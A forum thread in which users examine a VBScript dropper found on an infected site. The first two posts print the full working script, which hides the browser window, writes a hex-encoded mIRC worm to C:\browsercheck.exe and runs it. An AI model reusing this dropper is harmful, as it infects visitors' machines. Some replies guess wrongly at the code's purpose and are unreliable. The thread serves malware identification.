
Thread: New Virus

  1. #1

    New Virus

    From the virus-infected website http://www.kromberg.at/[removed]/show.php?
    f=drunkchicks.jpg :

    <script language=vbs>
    ' Moves the hosting browser window to (5000,5000) -- presumably off-screen on
    ' ordinary displays, so the page is not in view while the rest of the script runs.
    self.MoveTo 5000,5000
    ' 24 string slots, v(0)..v(23), that together hold the dropped executable as
    ' comma-separated hex byte tokens; the decoding loop further down consumes them.
    dim v(23)
    v(0)="4d,5a,90,y,03,y3,04,y3,z2,y2,b8,y7,40,y23,c8,y3,0e,1f,ba,0e,y,b4,09,cd,21,b8,01,4c,cd,21,54,68,69,73,20,70,72,6f,67,72,61,6d,20,63,61,6e2,6f,74,20,62,65,20,72,75,6e,20,69,6e,20,44"
    v(1)=",4f,53,20,6d,6f,64,65,2e,0d2,0a,24,y7,37,de,56,d8,73,bf,38,8b,73,bf,38,8b,73,bf,38,8b,2c,9d,33,8b,70,bf,38,8b,73,bf,39,8b,62,bf,38,8b,11,a0,2b,8b,76,bf,38,8b,75,9c,33,8b,71,bf,38,8b"
    v(2)=",52,69,63,68,73,bf,38,8b,y10,50,45,y2,4c,01,03,y,53,94,75,3f,y8,e0,y,0f,01,0b,01,06,y2,04,y3,06,y6,54,11,y3,10,y3,20,y4,40,y2,10,y3,02,y2,04,y7,04,y8,40,y3,04,y2,54,fe,y2,02,y5,10"
    v(3)=",y2,10,y4,10,y2,10,y6,10,yb,48,20,y2,3c,y54,20,y2,48,y1b,2e,74,65,78,74,y3,4d,02,y3,10,y3,04,y3,04,ye,20,y2,60,2e,72,64,61,74,61,y2,10,02,y3,20,y3,04,y3,08,ye,40,y2,40,2e,64,61,74,61"
    v(4)=",y3,0c,01,y3,30,y3,02,y3,0c,ye,40,y2,c0,y1c8,55,8b,ec,83,ec,30,53,56,57,6a,08,59,33,c0,8d,7d,d4,33,f6,f3,ab,56,68,y,c0,18,y,8d,45,fc,bf,ec,03,y2,56,50,c7,45,d0,24,y3,89,7d,dc,89,75"
    v(5)=",fc,e8,17,01,y2,39,75,fc,0f,84,cf,y3,57,68,f8,30,40,y,z,75,fc,e8,fa,y3,3b,c6,89,45,f8,75,03,56,eb,63,57,68,f0,30,40,y,z,75,fc,e8,e2,y3,8b,d8,3b,de,74,4c,ba,08,30,40,y,83,c9,z"
    v(6)=",8b,fa,33,c0,f2,ae,6a,01,6a,01,53,56,f7,d1,51,52,z,75,fc,e8,b6,y3,8b,f8,3b,fe,74,1d,8d,45,d0,50,53,z,75,f8,z,75,fc,e8,9a,y3,3b,c6,89,45,f4,75,1c,57,e8,87,y3,53,z,75,fc,e8,78,y3"
    v(7)=",z,75,f8,z,75,fc,e8,6d,y3,eb,4a,56,6a,64,68,90,40,y2,6a,01,53,50,6a,z,57,e8,51,y3,z,75,f4,e8,43,y3,57,e8,4f,y3,53,z,75,fc,e8,40,y3,z,75,f8,z,75,fc,e8,35,y3,6a,02,562,z,75,fc"
    v(8)=",e8,17,y3,z,75,fc,e8,09,y3,5f,5e,33,c0,5b,c9,c2,10,y,z,25,3c,20,40,y,z,25,2c,20,40,y,z,25,34,20,40,y,z,25,30,20,40,y,z,25,1c,20,40,y,z,25,28,20,40,y,z,25,24,20,40,y"
    v(9)=",z,25,202,40,y,z,25,38,20,40,y,z,25,40,20,40,y,55,8b,ec,83,ec,44,56,z,15,04,20,40,y,8b,f0,8a,06,3c,22,75,14,3c,22,74,08,8a,46,01,46,84,c0,75,f4,80,3e,22,75,0d,46,eb,0a,3c,20"
    v(10)=",7e,06,46,80,3e,20,7f,fa,8a,06,84,c0,74,04,3c,20,7e,e9,83,65,e8,y,8d,45,bc,50,z,15,08,20,40,y,e8,5b,y3,68,04,30,40,y,68,y,30,40,y,e8,32,y3,f6,45,e8,01,592,74,06,0f,b7,45,ec,eb"
    v(11)=",03,6a,0a,58,50,56,6a,y,6a,y,z,15,14,20,40,y,50,e8,2a,fe,z2,8b,f0,e8,3a,y3,56,z,15,0c,20,40,y,5e,56,8b,74,24,08,3b,74,24,0c,73,0d,8b,06,85,c0,74,02,z,d0,83,c6,04,eb,ed,5e,c3"
    v(12)=",6a,20,58,6a,04,50,a3,04,31,40,y,e8,24,y3,59,a3,y,31,40,y,59,c3,8b,0d,08,31,40,y,85,c9,74,11,a1,y,31,40,y,8d,0c,88,51,50,e8,b5,z3,592,c3,8b,44,24,04,0f,af,44,24,08,50,6a,08,z"
    v(13)=",15,y,20,40,y,50,z,15,10,20,40,y,c3,y1b3,f0,21,y2,d2,21,y2,c0,21,y2,9e,21,y2,e4,21,y2,ac,21,y6,18,21,y2,50,21,y2,42,21,y2,2e,21,y2,de,20,y3,21,y2,f0,20,y2,66,21,y2,cc,20,y2,80,21"
    v(14)=",y6,a0,20,ya,92,21,y2,1c,20,y2,84,20,ya,02,22,y3,20,y16,f0,21,y2,d2,21,y2,c0,21,y2,9e,21,y2,e4,21,y2,ac,21,y6,18,21,y2,50,21,y2,42,21,y2,2e,21,y2,de,20,y3,21,y2,f0,20,y2,66,21,y2,cc"
    v(15)=",20,y2,80,21,y6,7d,y,44,64,65,55,6e,69,6e,69,74,69,61,6c,69,7a,65,y,73,y,44,64,65,4e,61,6d,65,53,65,72,76,69,63,65,y2,67,y,44,64,65,44,69,73,63,6f,6e2,65,63,74,y,60,y,44,64,65"
    v(16)=",43,6c,69,65,6e,74,54,72,61,6e,73,61,63,74,69,6f,6e,y2,6b,y,44,64,65,46,72,652,53,74,72,69,6e,67,48,61,6e,64,6c,65,y,6a,y,44,64,65,46,72,652,44,61,74,61,48,61,6e,64,6c,65,y,62,y"
    v(17)=",44,64,65,43,6f,6e2,65,63,74,y2,64,y,44,64,65,43,72,65,61,74,65,44,61,74,61,48,61,6e,64,6c,65,y,65,y,44,64,65,43,72,65,61,74,65,53,74,72,69,6e,67,48,61,6e,64,6c,65,41,y2,70,y,44"
    v(18)=",64,65,49,6e,69,74,69,61,6c,69,7a,65,41,y2,55,53,45,52,33,32,2e,64,6c2,y2,7d,y,45,78,69,74,50,72,6f,63,65,732,y,26,01,47,65,74,4d,6f,64,75,6c,65,48,61,6e,64,6c,65,41,y2,50,01,47,65"
    v(19)=",74,53,74,61,72,74,75,70,49,6e,66,6f,41,y,ca,y,47,65,74,43,6f,6d2,61,6e,64,4c,69,6e,65,41,y,99,01,48,65,61,70,41,6c2,6f,63,y,40,01,47,65,74,50,72,6f,63,65,732,48,65,61,70,y2,4b,45"
    v(20)=",52,4e,45,4c,33,32,2e,64,6c2,y1fa,2f,61,6d,73,67,20,68,742,70,3a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,2e,61,74,2f,70,69,63,73,2f,73,68,6f,77,2e,70,68,70,3f,66,3d,64,72,75,6e,6b,63,68,69,63"
    v(21)=",6b,73,2e,6a,70,67,20,4c,4f,4c,20,7c,20,2f2,74,6f,70,69,63,20,24,63,68,61,6e,28,31,29,20,68,742,70,3a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,2e,61,74,2f,70,69,63,73,2f,73,68,6f,77,2e,70,68"
    v(22)=",70,3f,66,3d,64,72,75,6e,6b,63,68,69,63,6b,73,2e,6a,70,67,20,7c,20,2f2,74,6f,70,69,63,20,24,63,68,61,6e,28,32,29,20,68,742,70,3a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,2e,61,74,2f,70,69,63"
    v(23)=",73,2f,73,68,6f,77,2e,70,68,70,3f,66,3d,64,72,75,6e,6b,63,68,69,63,6b,73,2e,6a,70,67,20,7c,20,2f2,6d,6f,64,65,20,24,6d,65,20,2b,72,y4,43,4f,4d2,41,4e,44,y,6d,49,52,43,y104"

    ' Rewrites every slot of the global array v, replacing each occurrence of
    ' substring x with y (Replace with no count argument replaces all occurrences).
    ' Used just below to undo the one-letter shorthand in the payload
    ' ("z" -> "ff", "y" -> "00"), which is how the blob was shortened.
    ' No return value: the effect is the in-place edit of v.
    function res(x,y)
    For k = 0 To UBound(v)
    v(k) = Replace(v(k), x, y)
    Next
    End Function
    ' --- Decoder / dropper stub (analyst annotations) ---
    ' Expand the shorthand: "z" stands for the byte ff, "y" for the byte 00.
    ' After this the array holds plain two-hex-digit tokens, some with a
    ' trailing repeat count (e.g. "y1c8" becomes "001c8").
    res "z", "ff"
    res "y", "00"
    ' Join all 24 slots into one comma-separated string, then split into tokens.
    For m = 0 To UBound(v)
    it = it & v(m)
    Next
    tmp = Split(it, ",")
    ' WScript.Shell provides the process environment and the Run method used at the end.
    Set WshShell = CreateObject("WScript.Shell")
    Set WshEnv = WshShell.Environment("Process")
    ' The profile-based path is computed but immediately overwritten on the next
    ' line; the file is always written to the fixed path C:\browsercheck.exe.
    pth = WshEnv("HOMEDRIVE") & WshEnv("HOMEPATH") & "\browsercheck.exe"
    pth = "C:\browsercheck.exe"

    Set fso = CreateObject("Scripting.FileSystemObject")

    ' Second argument True: an existing browsercheck.exe is overwritten.
    ' NOTE(review): the bytes go through a text stream (CreateTextFile/Write), so
    ' values >= 0x80 presumably depend on the system code page -- not verified here.
    Set f = fso.CreateTextFile(pth, True)
    ' Run-length decode: the first two characters of each token are the hex byte
    ' value; any remaining characters are a HEX repeat count (Int("&H" & ...)),
    ' so "001c8" writes 0x1c8 zero bytes. The first tokens, 4d 5a ("MZ"), mark
    ' the output as a DOS/PE executable; the thread's last post identifies it
    ' as the mIRC worm described on the linked F-Secure page.
    For i = 0 To UBound(tmp)
    l = Len(tmp(i))
    b = Int("&H" & Left(tmp(i), 2))
    If l > 2 Then
    r = Int("&H" & Mid(tmp(i), 3, l-2))
    For j = 1 To r
    f.Write Chr(b)
    Next
    Else
    f.Write Chr(b)
    End If
    Next
    f.Close
    ' Launch the dropped file, with the path wrapped in double quotes.
    ' Detection angle: browser-hosted VBScript that creates WScript.Shell and
    ' Scripting.FileSystemObject, writes an .exe to a fixed path and calls Run
    ' is the behaviour to alert on; the fixed path is also a simple host IoC.
    WshShell.run("""" & pth & """")

    </script>

  2. #2
    self.MoveTo 5000,5000
    dim v(23)
    v(0)=" 4d,5a,90,y,03,y3,04,y3,z2,y2,b8,y7,40,y23,c8,y3,0e
    ,1f,ba,0e,y,b4,09,cd,21,b8,01,4c,cd,21,54,68,69,73
    ,20,70,72,6f,67,72,61,6d,20,63,61,6e2,6f,74,20,62,
    65,20,72,75,6e,20,69,6e,20,44"
    v(1)=" ,4f,53,20,6d,6f,64,65,2e,0d2,0a,24,y7,37,de,56,d8,
    73,bf,38,8b,73,bf,38,8b,73,bf,38,8b,2c,9d,33,8b,70
    ,bf,38,8b,73,bf,39,8b,62,bf,38,8b,11,a0,2b,8b,76,b
    f,38,8b,75,9c,33,8b,71,bf,38,8b"
    v(2)=" ,52,69,63,68,73,bf,38,8b,y10,50,45,y2,4c,01,03,y,5
    3,94,75,3f,y8,e0,y,0f,01,0b,01,06,y2,04,y3,06,y6,5
    4,11,y3,10,y3,20,y4,40,y2,10,y3,02,y2,04,y7,04,y8,
    40,y3,04,y2,54,fe,y2,02,y5,10"
    v(3)=" ,y2,10,y4,10,y2,10,y6,10,yb,48,20,y2,3c,y54,20,y2,
    48,y1b,2e,74,65,78,74,y3,4d,02,y3,10,y3,04,y3,04,y
    e,20,y2,60,2e,72,64,61,74,61,y2,10,02,y3,20,y3,04,
    y3,08,ye,40,y2,40,2e,64,61,74,61"
    v(4)=" ,y3,0c,01,y3,30,y3,02,y3,0c,ye,40,y2,c0,y1c8,55,8b
    ,ec,83,ec,30,53,56,57,6a,08,59,33,c0,8d,7d,d4,33,f
    6,f3,ab,56,68,y,c0,18,y,8d,45,fc,bf,ec,03,y2,56,50
    ,c7,45,d0,24,y3,89,7d,dc,89,75"
    v(5)=" ,fc,e8,17,01,y2,39,75,fc,0f,84,cf,y3,57,68,f8,30,4
    0,y,z,75,fc,e8,fa,y3,3b,c6,89,45,f8,75,03,56,eb,63
    ,57,68,f0,30,40,y,z,75,fc,e8,e2,y3,8b,d8,3b,de,74,
    4c,ba,08,30,40,y,83,c9,z"
    v(6)=" ,8b,fa,33,c0,f2,ae,6a,01,6a,01,53,56,f7,d1,51,52,z
    ,75,fc,e8,b6,y3,8b,f8,3b,fe,74,1d,8d,45,d0,50,53,z
    ,75,f8,z,75,fc,e8,9a,y3,3b,c6,89,45,f4,75,1c,57,e8
    ,87,y3,53,z,75,fc,e8,78,y3"
    v(7)=" ,z,75,f8,z,75,fc,e8,6d,y3,eb,4a,56,6a,64,68,90,40,
    y2,6a,01,53,50,6a,z,57,e8,51,y3,z,75,f4,e8,43,y3,5
    7,e8,4f,y3,53,z,75,fc,e8,40,y3,z,75,f8,z,75,fc,e8,
    35,y3,6a,02,562,z,75,fc"
    v(8)=" ,e8,17,y3,z,75,fc,e8,09,y3,5f,5e,33,c0,5b,c9,c2,10
    ,y,z,25,3c,20,40,y,z,25,2c,20,40,y,z,25,34,20,40,y
    ,z,25,30,20,40,y,z,25,1c,20,40,y,z,25,28,20,40,y,z
    ,25,24,20,40,y"
    v(9)=" ,z,25,202,40,y,z,25,38,20,40,y,z,25,40,20,40,y,55,
    8b,ec,83,ec,44,56,z,15,04,20,40,y,8b,f0,8a,06,3c,2
    2,75,14,3c,22,74,08,8a,46,01,46,84,c0,75,f4,80,3e,
    22,75,0d,46,eb,0a,3c,20"
    v(10)=" ,7e,06,46,80,3e,20,7f,fa,8a,06,84,c0,74,04,3c,20,7
    e,e9,83,65,e8,y,8d,45,bc,50,z,15,08,20,40,y,e8,5b,
    y3,68,04,30,40,y,68,y,30,40,y,e8,32,y3,f6,45,e8,01
    ,592,74,06,0f,b7,45,ec,eb"
    v(11)=" ,03,6a,0a,58,50,56,6a,y,6a,y,z,15,14,20,40,y,50,e8
    ,2a,fe,z2,8b,f0,e8,3a,y3,56,z,15,0c,20,40,y,5e,56,
    8b,74,24,08,3b,74,24,0c,73,0d,8b,06,85,c0,74,02,z,
    d0,83,c6,04,eb,ed,5e,c3"
    v(12)=" ,6a,20,58,6a,04,50,a3,04,31,40,y,e8,24,y3,59,a3,y,
    31,40,y,59,c3,8b,0d,08,31,40,y,85,c9,74,11,a1,y,31
    ,40,y,8d,0c,88,51,50,e8,b5,z3,592,c3,8b,44,24,04,0
    f,af,44,24,08,50,6a,08,z"
    v(13)=" ,15,y,20,40,y,50,z,15,10,20,40,y,c3,y1b3,f0,21,y2,
    d2,21,y2,c0,21,y2,9e,21,y2,e4,21,y2,ac,21,y6,18,21
    ,y2,50,21,y2,42,21,y2,2e,21,y2,de,20,y3,21,y2,f0,2
    0,y2,66,21,y2,cc,20,y2,80,21"
    v(14)=" ,y6,a0,20,ya,92,21,y2,1c,20,y2,84,20,ya,02,22,y3,2
    0,y16,f0,21,y2,d2,21,y2,c0,21,y2,9e,21,y2,e4,21,y2
    ,ac,21,y6,18,21,y2,50,21,y2,42,21,y2,2e,21,y2,de,2
    0,y3,21,y2,f0,20,y2,66,21,y2,cc"
    v(15)=" ,20,y2,80,21,y6,7d,y,44,64,65,55,6e,69,6e,69,74,69
    ,61,6c,69,7a,65,y,73,y,44,64,65,4e,61,6d,65,53,65,
    72,76,69,63,65,y2,67,y,44,64,65,44,69,73,63,6f,6e2
    ,65,63,74,y,60,y,44,64,65"
    v(16)=" ,43,6c,69,65,6e,74,54,72,61,6e,73,61,63,74,69,6f,6
    e,y2,6b,y,44,64,65,46,72,652,53,74,72,69,6e,67,48,
    61,6e,64,6c,65,y,6a,y,44,64,65,46,72,652,44,61,74,
    61,48,61,6e,64,6c,65,y,62,y"
    v(17)=" ,44,64,65,43,6f,6e2,65,63,74,y2,64,y,44,64,65,43,7
    2,65,61,74,65,44,61,74,61,48,61,6e,64,6c,65,y,65,y
    ,44,64,65,43,72,65,61,74,65,53,74,72,69,6e,67,48,6
    1,6e,64,6c,65,41,y2,70,y,44"
    v(18)=" ,64,65,49,6e,69,74,69,61,6c,69,7a,65,41,y2,55,53,4
    5,52,33,32,2e,64,6c2,y2,7d,y,45,78,69,74,50,72,6f,
    63,65,732,y,26,01,47,65,74,4d,6f,64,75,6c,65,48,61
    ,6e,64,6c,65,41,y2,50,01,47,65"
    v(19)=" ,74,53,74,61,72,74,75,70,49,6e,66,6f,41,y,ca,y,47,
    65,74,43,6f,6d2,61,6e,64,4c,69,6e,65,41,y,99,01,48
    ,65,61,70,41,6c2,6f,63,y,40,01,47,65,74,50,72,6f,6
    3,65,732,48,65,61,70,y2,4b,45"
    v(20)=" ,52,4e,45,4c,33,32,2e,64,6c2,y1fa,2f,61,6d,73,67,2
    0,68,742,70,3a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,
    2e,61,74,2f,70,69,63,73,2f,73,68,6f,77,2e,70,68,70
    ,3f,66,3d,64,72,75,6e,6b,63,68,69,63"
    v(21)=" ,6b,73,2e,6a,70,67,20,4c,4f,4c,20,7c,20,2f2,74,6f,
    70,69,63,20,24,63,68,61,6e,28,31,29,20,68,742,70,3
    a,2f2,773,2e,6b,72,6f,6d,62,65,72,67,2e,61,74,2f,7
    0,69,63,73,2f,73,68,6f,77,2e,70,68"
    v(22)=" ,70,3f,66,3d,64,72,75,6e,6b,63,68,69,63,6b,73,2e,6
    a,70,67,20,7c,20,2f2,74,6f,70,69,63,20,24,63,68,61
    ,6e,28,32,29,20,68,742,70,3a,2f2,773,2e,6b,72,6f,6
    d,62,65,72,67,2e,61,74,2f,70,69,63"
    v(23)=" ,73,2f,73,68,6f,77,2e,70,68,70,3f,66,3d,64,72,75,6
    e,6b,63,68,69,63,6b,73,2e,6a,70,67,20,7c,20,2f2,6d
    ,6f,64,65,20,24,6d,65,20,2b,72,y4,43,4f,4d2,41,4e,
    44,y,6d,49,52,43,y104"
    What Language Is That? HEX?

  3. #3
    Hi falcon,

    Looks like VB6, compressed?

    Sorry... not a lot of help there.

    Cheers

  4. #4
    I see how that works... It takes the big string (the source code of a file) at the top and puts it all in a variable. It creates a shell of a file called browsercheck.exe and injects the code into it. I've never seen source code like that before. I'm thinking that it's hex. I don't think it can be binary.

  5. #5
    Well, it is a combination of binary and some variables: ysomething, zsomething. Tried to do some deconstruction to see if there is a pattern or anything meaningful. No luck.

    But, yeah, it looks like a VBScript that injects something into the browser to replace favorites or default home pages.

    If this was found on a specific web site, it might be a good idea to block that domain and/or IP as a self-preservation action.

  6. #6
    see what happens when you look at pr0n





  7. #7
    Thanks for all the replies, I have already found the info: http://www.f-secure.com/v-descs/kromber.shtml

    This is a harmless mIRC worm. The virus website has already been taken down.
